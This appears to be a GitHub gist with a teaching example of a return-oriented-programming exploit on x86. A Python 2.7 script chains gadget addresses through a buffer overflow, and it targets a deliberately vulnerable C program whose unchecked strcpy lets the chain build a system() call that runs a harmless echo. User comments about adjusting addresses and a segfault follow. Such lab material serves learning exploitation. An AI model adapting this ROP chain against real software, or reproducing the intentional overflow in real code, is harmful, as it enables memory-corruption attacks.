Simple ROP Exploit Example (x86)
| # NOTE: For Python 2.7 | |
| import os | |
| import struct | |
| #Find gadgets | |
| pop_ret = 0x08049ca5 # start address of a pop,ret sequence | |
| pop_pop_ret = 0x08049ca4 # start address of a pop,pop,ret sequence | |
| lazy = 0x08049b05 # objdump -d | grep lazy | |
| food = 0x08049b30 # objdump -d | grep food | |
| feeling_sick = 0x08049b92 # objdump -d | grep feeling_sick | |
| #Buffer Overflow | |
| payload = "A"*0x6c | |
| payload += "BBBB" | |
| #food(0xdeadbeef) gadget | |
| payload += struct.pack("I", food) | |
| payload += struct.pack("I", pop_ret) | |
| payload += struct.pack("I", 0xdeadbeef) | |
| #feeling_sick(0xd15ea5e, 0x0badf00d) gadget | |
| payload += struct.pack("I", feeling_sick) | |
| payload += struct.pack("I", pop_pop_ret) | |
| payload += struct.pack("I", 0xd15ea5e) | |
| payload += struct.pack("I", 0x0badf00d) | |
| payload += struct.pack("I", lazy) | |
| os.system("./simple-rop \"%s\"" % payload) |
| #include <stdio.h> | |
| #include <string.h> | |
| #include <stdlib.h> | |
| char string[100]; | |
| // I might need this later. ¯\_(ツ)_/¯ | |
| // I'm not using it so it shouldn't affect anything. | |
| void lazy() { | |
| system(string); | |
| } | |
| void food(int magic) { | |
| printf("THANK YOU!\n"); | |
| if (magic == 0xdeadbeef) { | |
| strcat(string, "/bin"); | |
| } | |
| } | |
| void feeling_sick(int magic1, int magic2) { | |
| printf("1m f33ling s1cK...\n"); | |
| if (magic1 == 0xd15ea5e && magic2 == 0x0badf00d) { | |
| strcat(string, "/echo 'This message will self destruct in 30 seconds...BOOM!'"); | |
| } | |
| } | |
| void vuln(char *string) { | |
| char buffer[100] = {0}; | |
| strcpy(buffer, string); // I don't know any better. | |
| } | |
| int main(int argc, char** argv) { | |
| string[0] = 0; | |
| printf("m3 hUN6rY...cAn 1 haZ 5H3ll?! f33d mE s0m3 beef\n\n"); | |
| if (argc > 1) { | |
| vuln(argv[1]); | |
| } else { | |
| printf("y0u f0rG0T t0 f33d mE!!!\n"); | |
| } | |
| return 0; | |
| } |
This comment has been minimized.
This comment has been minimized.
|
You'll probably have to change the hardcoded addresses of the gadgets. |
This comment has been minimized.
This comment has been minimized.
|
Should I just set pop_ret to the start of the overflow? like the first appearence of "BBBB" or after it |
This comment has been minimized.
This comment has been minimized.
|
You should set |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This comment has been minimized.
it created a segmenttion fault. what i have to change?